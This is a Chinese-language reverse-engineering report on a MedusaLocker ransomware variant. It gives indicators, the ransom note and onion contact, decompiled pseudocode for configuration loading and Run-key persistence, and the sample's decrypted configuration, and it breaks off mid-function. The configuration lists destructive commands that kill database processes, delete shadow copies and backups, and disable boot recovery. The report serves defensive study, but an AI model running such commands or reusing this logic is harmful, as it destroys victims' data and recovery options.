1.背景
1.1 家族介绍
MedusaLocker 家族首次于 2019 年 9 月出现,MedusaLocker 家族通常通过有漏洞的远程桌面协议(RDP)配置获取受害者设备访问权限,攻击者还经常使用电子邮件钓鱼和垃圾邮件活动——直接将勒索软件附加到电子邮件中——作为初始入侵渠道。
MedusaLocker 对受害者的数据进行加密,并在包含加密文件的每个文件夹中留下带有勒索信。勒索信指示受害者向特定的比特币钱包地址提供勒索软件付款。MedusaLocker 似乎根据观察到的赎金支付拆分作为勒索软件即服务 (RaaS) 模型运行。典型的 RaaS 模型涉及勒索软件开发人员和在受害者系统上部署勒索软件的各种附属公司。MedusaLocker 家族付款似乎始终在附属公司之间分配,附属公司收到 55% 到 60% 的赎金;以及接收剩余部分的开发人员。
1.2 平台介绍
MedusaLocker家族提供两个暗网地址:一个是博客,另一个是聊天室。博客中留有Tox联系方式,并会公开所有受害者的信息,点击特定受害者后,可以查看其详细的泄露数据和赎金要求;聊天室则要求输入ID和联系邮箱,且支持上传一个被加密的文件进行测试。提交后,系统将为受害者生成一个独立的聊天室,供其与MedusaLocker家族进行私密交流,其他人无法查看该对话内容。
1.2.1 博客页
博客首页
数据详情页
1.2.2 聊天室页
加载进入聊天室
成功创建独立聊天室
独立聊天室页面
2.恶意文件基础信息
2.1 加密器基本信息
| 文件名 | lock8.exe |
|---|---|
| 编译器 | Microsoft Visual C/C++(19.36.33523)LTCG/C++ |
| 大小 | 419.5 KB |
| 操作系统 | Windows(Vista)AMD64, 64位, Console |
| 模式 | 64 位 |
| 类型 | EXEC |
| 字节序 | LE |
| MD5 | 7d08b5bcfcb0170f82820785944f30fb |
| SHA1 | 854443513882ca2837d4ff30eca7143ec3e06b4d |
| SHA256 | 33ca49acd304ed65753aced17aab019143d04c59bb3082b3f74f0376bf4ef2c8 |
2.2 勒索信
YOUR COMPANY NETWORK HAS BEEN PENETRATED! All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. pomocit07@kanzensei.top pomocit07@surakshaguardian.com To contact us, create a new free email account on the site: https://protonmail.com YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. TOR LINK>>>>>>>>>
3.加密后文件分析
3.1威胁分析
| 病毒家族 | medusalocker |
|---|---|
| 首次出现时间/捕获分析时间 | 2024/11/19 || 2025/1/14 |
| 威胁类型 | 勒索软件,加密病毒 |
| 加密文件扩展名 | .lock8 |
| 勒索信文件名 | How_to_back_files.txt |
| 有无免费解密器? | 无 |
| 联系邮箱 | pomocit07@surakshaguardian.com |
| 检测名称 | Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)),Cylance(Unsafe),DeepInstinct(MALICIOUS),Emsisoft(Gen:Variant.Tedy.512515 (B)),ESET-NOD32(A Variant Of MSIL/Filecoder.LU),GData(Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt),K7GW(Trojan ( 0052f4e41 )) |
| 感染症状 | 无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.lock8)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。 |
| 感染方式 | 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接 |
| 受灾影响 | 所有文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。 |
3.2 加密的测试文件
3.2.1 文件名
sierting.txt
3.2.2 具体内容
由于样本不加密1000字节大小以下的文件,因此手动填充测试文件增加至1000字节大小并进行加密。
3.2.3 加密文件名特征
加密文件名 = 原始文件名+lock8 ,例如:sierting.txt.lock8
3.2.4 加密文件结构
3.3 加密算法
文件加密使用了AES-ECB加密算法,对加密文件的AES密钥,采用了RSA加密。
3.3.1 AES密钥生成
KEY
通过调用CryptGenRandom函数生成密钥
3.3.2 RSA密钥生成
内置公钥:
内置rsa公钥如下
  BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
加密aeskey的rsa公钥和私钥
调用API函数CryptGenKey生成密钥对。
3.3.3 加密流程
3.3.4 程序执行流程
4 逆向分析
4.1 加密器逆向分析
4.1.1 初始化配置
创建事务
printf_0((char *)L"[-] Context initialize...\n");
JobObjectW = CreateJobObjectW(0LL, 0LL);
hJob = JobObjectW;
if ( JobObjectW )
{
JobObjectInformation = 0;
v1 = 0.0;
v45 = 0LL;
v46 = 0LL;
v47 = 0LL;
v48 = 0LL;
v49 = 0LL;
v50 = 0LL;
v51 = 0LL;
v52 = 0LL;
v53 = 0LL;
v54 = 0;
HIDWORD(v45) = 0x2000;
if ( !SetInformationJobObject(JobObjectW, JobObjectExtendedLimitInformation, &JobObjectInformation, 0x90u) )
{
GetLastError();
printf_0((char *)L"[!] SetInformationJobObject failed 0x%X\n");
return 0;
}
}
else
{
v1 = printf_0((char *)L"[!] Job object not created\n");
}
加载资源
// Hidden C++ exception states: #wind=1
__int64 __fastcall load_resource(__int64 a1, __int64 a2, const WCHAR **a3)
{
const WCHAR *v4; // rsi
HMODULE ModuleHandleW; // rax
HMODULE v6; // rbx
HRSRC ResourceW; // rax
HRSRC v8; // rdi
HGLOBAL Resource; // rax
const void *v10; // rbp
DWORD v11; // eax
__int64 v12; // rbx
__int64 v13; // rsi
_BYTE *v14; // rdi
_BYTE *v15; // r15
size_t v16; // r15
char *v17; // rbx
_BYTE *v18; // rax
void *Src[2]; // [rsp+28h] [rbp-30h] BYREF
__int64 v21; // [rsp+38h] [rbp-20h]
v4 = *a3;
printf_0((char *)L"[-] Get resource with id %i and type %s...\n");
ModuleHandleW = GetModuleHandleW(0LL);
v6 = ModuleHandleW;
if ( ModuleHandleW
&& (ResourceW = FindResourceW(ModuleHandleW, (LPCWSTR)0x65, v4), (v8 = ResourceW) != 0LL)
&& (Resource = LoadResource(v6, ResourceW)) != 0LL
&& (v10 = LockResource(Resource)) != 0LL )
{
v11 = SizeofResource(v6, v8);
v12 = v11;
*(_OWORD *)Src = 0LL;
v13 = 0LL;
v21 = 0LL;
if ( v11 )
{
alloc_memory(Src, v11);
v14 = Src[0];
memset(Src[0], 0, (unsigned int)v12);
v15 = &v14[v12];
Src[1] = &v14[v12];
v13 = v21;
}
else
{
v15 = Src[1];
v14 = Src[0];
}
v16 = v15 - v14;
memcpy(v14, v10, v16);
*(_BYTE *)a1 = 1;
*(_QWORD *)(a1 + 8) = 0LL;
*(_QWORD *)(a1 + 16) = 0LL;
*(_QWORD *)(a1 + 24) = 0LL;
if ( v16 )
{
if ( v16 > 0x7FFFFFFFFFFFFFFFLL )
unknown_libname_6();
alloc_memory((_QWORD *)(a1 + 8), v16);
v17 = *(char **)(a1 + 8);
memcpy(v17, v14, v16);
*(_QWORD *)(a1 + 16) = &v17[v16];
}
if ( v14 )
{
v18 = v14;
if ( (unsigned __int64)(v13 - (_QWORD)v14) >= 0x1000 )
{
v14 = (_BYTE *)*((_QWORD *)v14 - 1);
if ( (unsigned __int64)(v18 - v14 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v14);
}
}
else
{
printf_0((char *)L"[!] Resource with id %i and type %s not found\n");
*(_BYTE *)a1 = 0;
*(_QWORD *)(a1 + 8) = 0LL;
*(_QWORD *)(a1 + 16) = 0LL;
*(_QWORD *)(a1 + 24) = 0LL;
}
return a1;
}
自解密生成配置信息
LODWORD(v145) = 0;
LODWORD(v144) = 0;
printf_0((char *)L"[-] Load settings from resource...\n");
v123 = *(_OWORD *)get_length(&v126, L"SETTINGS");
load_resource((__int64)v139, v1, (const WCHAR **)&v123);
if ( !v139[0] )
{
v6 = 0;
v3 = Block[0];
goto LABEL_180;
}
*(_QWORD *)&v123 = "PUTINHUILO1337";
*((_QWORD *)&v123 + 1) = 14LL;
v129 = v123;
v2 = xor_data((void **)&pExceptionObject, (__int64)Block, (__int64 *)&v129);
move_0(Block, v2);
debug055:00000223EA917340 aBchiperdrivesT db '{',0Ah ; DATA XREF: Stack[00000A50]:00000062440FEA90↑o
debug055:00000223EA917342 db '"bChiperDrives": true,',0Ah
debug055:00000223EA917359 db '"bHideConsole": false,',0Ah
debug055:00000223EA917370 db '"bRemoveRecycle": true,',0Ah
debug055:00000223EA917388 db '"bThreadPool": false,',0Ah
debug055:00000223EA91739E db '"nEncryptionBlockBytes": 750016,',0Ah
debug055:00000223EA9173BF db '"nEncryptionLimitBytes": 2780352,',0Ah
debug055:00000223EA9173E1 db '"nEncryptionSkipBytes": 250048,',0Ah
debug055:00000223EA917401 db '"nEncryptionType": 1,',0Ah
debug055:00000223EA917417 db '"nEncryptionTypeIO": 0,',0Ah
debug055:00000223EA91742F db '"nThreads": 0,',0Ah
debug055:00000223EA91743E db '"sEncryptedFileExtension": ".lock8",',0Ah
debug055:00000223EA917463 db '"sMasterPublicKey": "BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHX'
debug055:00000223EA9174A4 db 'ZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4'
debug055:00000223EA9174E5 db 'Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox9'
debug055:00000223EA917526 db '9fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKE'
debug055:00000223EA917567 db 'im/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRq'
debug055:00000223EA9175A8 db 'u0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830"'
debug055:00000223EA9175E9 db ',',0Ah
debug055:00000223EA9175EB db '"sRequirementsData": " YOUR COMPANY NETWORK HAS BEEN PENETRATED!'
debug055:00000223EA91762C db '\n\n All your important files have been encrypted!\n\n '
debug055:00000223EA91766D db ' Your files are safe! Only modified. (RSA+AES)\n\n ANY ATTEM'
debug055:00000223EA9176AE db 'PT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE\n WILL PERMAN'
debug055:00000223EA9176EF db 'ENTLY CORRUPT IT.\n DO NOT MODIFY ENCRYPTED FILES.\n DO NOT REN'
debug055:00000223EA917730 db 'AME ENCRYPTED FILES.\n\n No software available on internet can h'
debug055:00000223EA917771 db 'elp you. We are the only ones able to\n solve your problem.\n\n '
debug055:00000223EA9177B2 db ' We gathered highly confidential/personal data. These data are cu'
debug055:00000223EA9177F3 db 'rrently stored on\n a private server. This server will be immedi'
debug055:00000223EA917834 db 'ately destroyed after your payment.\n If you decide to not pay, '
debug055:00000223EA917875 db 'we will release your data to public or re-seller.\n So you can e'
debug055:00000223EA9178B6 db 'xpect your data to be publicly available in the near future..\n\n'
debug055:00000223EA9178F7 db '\n We only seek money and our goal is not to damage your reputat'
debug055:00000223EA917938 db 'ion or prevent\n your business from running.\n\n You will can s'
debug055:00000223EA917979 db 'end us 2-3 non-important files and we will decrypt it for free\n '
debug055:00000223EA9179BA db ' to prove we are able to give your files back.\n pomocit07@kanze'
debug055:00000223EA9179FB db 'nsei.top\n pomocit07@surakshaguardian.com\n To contact us, crea'
debug055:00000223EA917A3C db 'te a new free email account on the site: https://protonmail.com\n'
debug055:00000223EA917A7D db '\n\n YOU DON',27h,'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE '
debug055:00000223EA917AB8 db 'HIGHER.\n\n TOR LINK>>>>>>>>> qd7pcafncosqfqu3ha6fcx4h6sr7tzwa'
debug055:00000223EA917AF9 db 'gzpcdcnytiw3b6varaeqv5yd.onion\n",',0Ah
debug055:00000223EA917B1C db '"sRequirementsFilename": "How_to_back_files.txt",',0Ah
debug055:00000223EA917B4E db '"vecFullEncryptionExtensions": [],',0Ah
debug055:00000223EA917B71 db '"vecPostRunCommands": [],',0Ah
debug055:00000223EA917B8B db '"vecPreRunCommands": [',0Ah
debug055:00000223EA917BA2 db '"rem Kill \"SQL\"",',0Ah
debug055:00000223EA917BB6 db '"taskkill -f -im sqlbrowser.exe",',0Ah
debug055:00000223EA917BD8 db '"taskkill -f -im sql writer.exe",',0Ah
debug055:00000223EA917BFA db '"taskkill -f -im sqlserv.exe",',0Ah
debug055:00000223EA917C19 db '"taskkill -f -im msmdsrv.exe",',0Ah
debug055:00000223EA917C38 db '"taskkill -f -im MsDtsSrvr.exe",',0Ah
debug055:00000223EA917C59 db '"taskkill -f -im sqlceip.exe",',0Ah
debug055:00000223EA917C78 db '"taskkill -f -im fdlauncher.exe",',0Ah
debug055:00000223EA917C9A db '"taskkill -f -im Ssms.exe",',0Ah
debug055:00000223EA917CB6 db '"taskkill -f -im SQLAGENT.EXE",',0Ah
debug055:00000223EA917CD6 db '"taskkill -f -im fdhost.exe",',0Ah
debug055:00000223EA917CF4 db '"taskkill -f -im ReportingServicesService.exe",',0Ah
debug055:00000223EA917D24 db '"taskkill -f -im msftesql.exe",',0Ah
debug055:00000223EA917D44 db '"taskkill -f -im pg_ctl.exe",',0Ah
debug055:00000223EA917D62 db '"taskkill -f -impostgres.exe",',0Ah
debug055:00000223EA917D81 db '"net stop MSSQLServerADHelper100",',0Ah
debug055:00000223EA917DA4 db '"net stop MSSQL$ISARS",',0Ah
debug055:00000223EA917DBC db '"net stop MSSQL$MSFW",',0Ah
debug055:00000223EA917DD3 db '"net stop SQLAgent$ISARS",',0Ah
debug055:00000223EA917DEE db '"net stop SQLAgent$MSFW",',0Ah
debug055:00000223EA917E08 db '"net stop SQLBrowser",',0Ah
debug055:00000223EA917E1F db '"net stop REportServer$ISARS",',0Ah
debug055:00000223EA917E3E db '"net stop SQLWriter",',0Ah
debug055:00000223EA917E54 db '"vssadmin.exe Delete Shadows /All /Quiet",',0Ah
debug055:00000223EA917E7F db '"wbadmin delete backup -keepVersion:0 -quiet",',0Ah
debug055:00000223EA917EAE db '"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",',0Ah
debug055:00000223EA917EDE db '"wmic.exe SHADOWCOPY /nointeractive",',0Ah
debug055:00000223EA917F04 db '"bcdedit.exe /set {default} recoverynabled No",',0Ah
debug055:00000223EA917F34 db '"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"',0Ah
debug055:00000223EA917F74 db '],',0Ah
debug055:00000223EA917F77 db '"vecProgramFilesPath": [',0Ah
debug055:00000223EA917F90 db '"\\Microsoft SQL Server\\",',0Ah
debug055:00000223EA917FAC db '"\\Microsoft SQL Server Management Studio 18\\"',0Ah
debug055:00000223EA917FDC db '],',0Ah
debug055:00000223EA917FDF db '"vecSkipFileExtensions": [',0Ah
debug055:00000223EA917FFA db '".exe",',0Ah
debug055:00000223EA918002 db '".dll",',0Ah
debug055:00000223EA91800A db '".sys",',0Ah
debug055:00000223EA918012 db '".ini",',0Ah
debug055:00000223EA91801A db '".rdp",',0Ah
debug055:00000223EA918022 db '".lnk",',0Ah
debug055:00000223EA91802A db '".bmp",',0Ah
debug055:00000223EA918032 db '".mov",',0Ah
debug055:00000223EA91803A db '".cab",',0Ah
debug055:00000223EA918042 db '".url",',0Ah
debug055:00000223EA91804A db '".vsix",',0Ah
debug055:00000223EA918053 db '".msi",',0Ah
debug055:00000223EA91805B db '".pyc",',0Ah
debug055:00000223EA918063 db '".pyd",',0Ah
debug055:00000223EA91806B db '".vdm",',0Ah
debug055:00000223EA918073 db '".json"',0Ah
debug055:00000223EA91807B db '],',0Ah
debug055:00000223EA91807E db '"vecSkipPaths": [',0Ah
debug055:00000223EA918090 db '"C:\\perflogs",',0Ah
debug055:00000223EA9180A0 db '"C:\\Intel",',0Ah
debug055:00000223EA9180AD db '"C:\\HP",',0Ah
debug055:00000223EA9180B7 db '"C:\\AMD",',0Ah
debug055:00000223EA9180C2 db '"C:\\Dell",',0Ah
debug055:00000223EA9180CE db '"C:\\Drivers",',0Ah
debug055:00000223EA9180DD db '"C:\\inetpub",',0Ah
debug055:00000223EA9180EC db '"B:\\Boot",',0Ah
debug055:00000223EA9180F8 db '"A:\\Boot",',0Ah
debug055:00000223EA918104 db '"B:\\EFI",',0Ah
debug055:00000223EA91810F db '"A:\\EFI",',0Ah
debug055:00000223EA91811A db '"C:\\ProgramData\\AnyDesk",',0Ah
debug055:00000223EA918136 db '":\\Boot",',0Ah
debug055:00000223EA918141 db '"\\appdata\\"',0Ah
debug055:00000223EA91814F db ']',0Ah,'}'
配置资源中的公钥
BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
将配置资源中的公钥进行base64解码,以便后续加密使用
// Hidden C++ exception states: #wind=26
BOOL __fastcall sub_7FF6BE634AE0(const WCHAR **a1, __int64 a2)
{
const WCHAR *v2; // rbp
const WCHAR *v4; // rcx
BOOL result; // eax
BYTE *v6; // rdx
char *v7; // rsi
unsigned __int64 v8; // rcx
BYTE *v9; // rax
size_t v10; // rdi
BOOL v11; // esi
__int64 v12; // rbp
BYTE *v13; // rdx
unsigned __int64 v14; // rcx
size_t v15; // rdi
DWORD pcbBinary; // [rsp+60h] [rbp+8h] BYREF
v2 = *a1;
v4 = *a1;
pcbBinary = 0;
result = CryptStringToBinaryW(v4, 0, 1u, 0LL, &pcbBinary, 0LL, 0LL);
if ( !result )
return result;
v6 = *(BYTE **)a2;
v7 = *(char **)(a2 + 8);
v8 = (unsigned __int64)&v7[-*(_QWORD *)a2];
if ( pcbBinary >= v8 )
{
if ( pcbBinary <= v8 )
goto LABEL_9;
if ( (unsigned __int64)pcbBinary > *(_QWORD *)(a2 + 16) - (_QWORD)v6 )
{
sub_7FF6BE635790(a2, pcbBinary);
goto LABEL_9;
}
v10 = pcbBinary - v8;
memset(v7, 0, v10);
v9 = (BYTE *)&v7[v10];
}
else
{
v9 = &v6[pcbBinary];
}
*(_QWORD *)(a2 + 8) = v9;
LABEL_9:
result = CryptStringToBinaryW(v2, 0, 1u, *(BYTE **)a2, &pcbBinary, 0LL, 0LL);
v11 = result;
if ( result )
{
v12 = *(_QWORD *)(a2 + 8);
v13 = *(BYTE **)a2;
v14 = v12 - *(_QWORD *)a2;
if ( pcbBinary >= v14 )
{
if ( pcbBinary > v14 )
{
if ( (unsigned __int64)pcbBinary <= *(_QWORD *)(a2 + 16) - (_QWORD)v13 )
{
v15 = pcbBinary - v14;
memset(*(void **)(a2 + 8), 0, v15);
*(_QWORD *)(a2 + 8) = v15 + v12;
}
else
{
sub_7FF6BE635790(a2, pcbBinary);
}
}
}
else
{
*(_QWORD *)(a2 + 8) = &v13[pcbBinary];
}
return v11;
}
return result;
}
得到base64解码后的公钥
06 02 00 00 00 a4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 b1 aa 82 f4 93 4f d8 2d f7 93 b8 f1 d7 66 21 19 cd 54 dc b8 f9 39 87 48 b3 cb 92 03 3a 17 6d 69 a9 f0 5b 0a f2 79 b2 bb 2e a2 47 f9 fb 95 07 21 3a 88 2f c5 71 7a 79 00 31 dd f2 31 50 e1 57 3e 40 b5 2e 55 64 e0 91 9f ed 48 d6 8a e7 66 44 b0 c4 4e 76 34 8e db d0 4f 50 d1 56 cb d7 4b 50 ab bc 2a 68 26 90 19 f9 d5 de 00 6a 32 28 c7 df 5f c7 22 79 60 70 25 74 c6 b0 ec 96 0c 52 2e 4c d1 31 c1 be 11 1b d9 b8 d4 22 44 01 97 0a 46 c9 c7 8e cd d4 ff 94 a0 8b f6 77 7a 72 49 ce 88 a1 22 9b f9 32 4b 9f 4c 93 0d 72 63 cb 1a b4 b6 c1 e8 6d 43 37 8f 27 12 27 80 87 6e 7c fd cf e5 79 7e 04 16 e9 7a 96 15 e8 fc c2 1d a2 4c ef 11 04 6a bb 4c 3d e3 d0 4c c9 bb f6 12 aa 3c fe 29 de bc 5a 36 ca 4d cd fc 4a 33 ab 7d 60 17 92 a2 3f 1a 72 f9 98 2b cf 79 ab 0b e9 dd bb 06 cf a3 cd f4
4.1.2 程序自身添加到开机启动项中(权限维持)
将程序自身添加到开机启动项中
// Hidden C++ exception states: #wind=5
void __fastcall add_startup(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
const WCHAR *v4; // rdx
unsigned int v5; // eax
HKEY v6; // rbx
WCHAR *v7; // rcx
BYTE **v8; // r9
BYTE *v9; // rdi
unsigned __int64 v10; // rsi
__int64 v11; // r10
__int64 v12; // rcx
int v13; // r11d
const wchar_t *v14; // rax
__int64 v15; // r9
wchar_t v16; // dx
BYTE **v17; // rdx
BYTE *v18; // rcx
BYTE **v19; // rax
_QWORD *v20; // rax
__int64 v21; // r9
__int128 v22; // xmm6
__int128 v23; // xmm7
BYTE *v24; // rcx
WCHAR *v25; // rcx
const BYTE *v26; // rcx
const WCHAR *v27; // rdx
unsigned int v28; // eax
WCHAR *v29; // rcx
BYTE *v30; // rcx
const char *v31; // rax
LPCWSTR lpSubKey[2]; // [rsp+50h] [rbp-D8h] BYREF
__m128i si128; // [rsp+60h] [rbp-C8h]
BYTE *lpData[2]; // [rsp+70h] [rbp-B8h] BYREF
__int64 v35[2]; // [rsp+80h] [rbp-A8h]
const std::exception *v36; // [rsp+90h] [rbp-98h] BYREF
_BYTE pExceptionObject[40]; // [rsp+98h] [rbp-90h] BYREF
_BYTE v38[80]; // [rsp+C0h] [rbp-68h] BYREF
HKEY hKey; // [rsp+130h] [rbp+8h] BYREF
*(_OWORD *)lpSubKey = 0LL;
si128 = 0LL;
try
{
copy_str(lpSubKey, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0x2DuLL, a4);
hKey = 0LL;
v4 = (const WCHAR *)lpSubKey;
if ( si128.m128i_i64[1] > 7uLL )
v4 = lpSubKey[0];
v5 = RegCreateKeyExW(HKEY_CURRENT_USER, v4, 0, 0LL, 0, 2u, 0LL, &hKey, 0LL);
if ( v5 )
{
error_printf(pExceptionObject, v5, "RegCreateKeyExW failed.");
throw (winreg::RegException *)pExceptionObject;
}
v6 = hKey;
if ( si128.m128i_i64[1] > 7uLL )
{
v7 = (WCHAR *)lpSubKey[0];
if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
{
v7 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v7 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v7);
}
si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790D0);
LOWORD(lpSubKey[0]) = 0;
if ( v6 )
{
sub_7FF6BE6221C0((__int64)lpData, (__int64)&qword_7FF6BE683D48);
v8 = lpData;
v9 = lpData[0];
v10 = v35[1];
if ( v35[1] > 7uLL )
v8 = (BYTE **)lpData[0];
v11 = v35[0];
if ( v35[0] >= 4uLL )
{
v12 = 4LL;
v13 = 0;
v14 = L"\\\\?\\";
v15 = (char *)v8 - (char *)L"\\\\?\\";
while ( 1 )
{
v16 = *(const wchar_t *)((char *)v14 + v15);
if ( v16 != *v14 )
break;
++v14;
if ( !--v12 )
goto LABEL_19;
}
v13 = 1;
if ( v16 < *v14 )
v13 = -1;
LABEL_19:
if ( !v13 )
{
*(_OWORD *)lpSubKey = 0LL;
si128 = 0LL;
v17 = lpData;
if ( v35[1] > 7uLL )
v17 = (BYTE **)lpData[0];
copy_str(lpSubKey, v17 + 1, v35[0] - 4, v15);
if ( v35[1] > 7uLL )
{
v18 = lpData[0];
if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
{
v18 = (BYTE *)*((_QWORD *)lpData[0] - 1);
if ( (unsigned __int64)(lpData[0] - v18 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v18);
}
*(_OWORD *)lpData = *(_OWORD *)lpSubKey;
*(__m128i *)v35 = si128;
v10 = _mm_srli_si128(si128, 8).m128i_u64[0];
v11 = si128.m128i_i64[0];
v9 = (BYTE *)lpSubKey[0];
}
}
if ( v11 == 0x7FFFFFFFFFFFFFFELL )
unknown_libname_3();
v19 = lpData;
if ( v10 > 7 )
v19 = (BYTE **)v9;
sub_7FF6BE628A80(lpSubKey, 1LL, v19, v11);
v20 = sub_7FF6BE626470(lpSubKey, L"\"", 1uLL);
v22 = *(_OWORD *)v20;
v23 = *((_OWORD *)v20 + 1);
v20[2] = 0LL;
v20[3] = 7LL;
*(_WORD *)v20 = 0;
if ( v35[1] > 7uLL )
{
v24 = lpData[0];
if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
{
v24 = (BYTE *)*((_QWORD *)lpData[0] - 1);
if ( (unsigned __int64)(lpData[0] - v24 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v24);
}
*(_OWORD *)lpData = v22;
*(_OWORD *)v35 = v23;
if ( si128.m128i_i64[1] > 7uLL )
{
v25 = (WCHAR *)lpSubKey[0];
if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
{
v25 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v25 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v25);
}
*(_OWORD *)lpSubKey = 0LL;
si128 = 0LL;
copy_str(lpSubKey, L"BabyLockerKZ", 0xCuLL, v21);
v26 = (const BYTE *)lpData;
if ( v35[1] > 7uLL )
v26 = lpData[0];
v27 = (const WCHAR *)lpSubKey;
if ( si128.m128i_i64[1] > 7uLL )
v27 = lpSubKey[0];
v28 = RegSetValueExW(v6, v27, 0, 1u, v26, 2 * LODWORD(v35[0]) + 2);
if ( v28 )
{
error_printf(v38, v28, "Cannot write string value: RegSetValueExW failed.");
throw (winreg::RegException *)v38;
}
if ( si128.m128i_i64[1] > 7uLL )
{
v29 = (WCHAR *)lpSubKey[0];
if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
{
v29 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v29 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v29);
}
printf("[+] Program added to autostart successfully.\n");
if ( v35[1] > 7uLL )
{
v30 = lpData[0];
if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
{
v30 = (BYTE *)*((_QWORD *)lpData[0] - 1);
if ( (unsigned __int64)(lpData[0] - v30 - 8) > 0x1F )
invalid_parameter_noinfo_noreturn();
}
j_j_free(v30);
}
}
if ( v6
&& (unsigned __int64)(v6 + 0x20000000) > 5
&& v6 != HKEY_CURRENT_USER_LOCAL_SETTINGS
&& v6 != HKEY_PERFORMANCE_NLSTEXT
&& v6 != HKEY_PERFORMANCE_TEXT )
{
RegCloseKey(v6);
}
}
catch ( const std::exception *v36 )
{
v31 = (const char *)(*(__int64 (__fastcall **)(const std::exception *))(*(_QWORD *)v36 + 8LL))(v36);
printf("[!] Exception in %s: %s\n", "Context::Autostart", v31);
}
}
执行完毕后,可以从SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run注册表中观察到如下内容:
4.1.3 存储加密后的密钥对
初始化RSA加密对象,生成RSA公钥和私钥
__int64 __fastcall sub_7FF6BE634C20(__int64 a1, __int64 a2)
{
unsigned int v2; // ebx
char *v3; // rdi
BYTE *v4; // rax
size_t v5; // rbx
char *v6; // rdi
BYTE *v7; // rax
size_t v8; // rbx
DWORD v10; // [rsp+50h] [rbp+8h] BYREF
int v11; // [rsp+54h] [rbp+Ch]
DWORD pdwDataLen; // [rsp+58h] [rbp+10h] BYREF
int v13; // [rsp+5Ch] [rbp+14h]
HCRYPTKEY phKey; // [rsp+60h] [rbp+18h] BYREF
HCRYPTPROV hProv; // [rsp+68h] [rbp+20h] BYREF
v13 = HIDWORD(a2);
v11 = HIDWORD(a1);
pdwDataLen = 0;
v10 = 0;
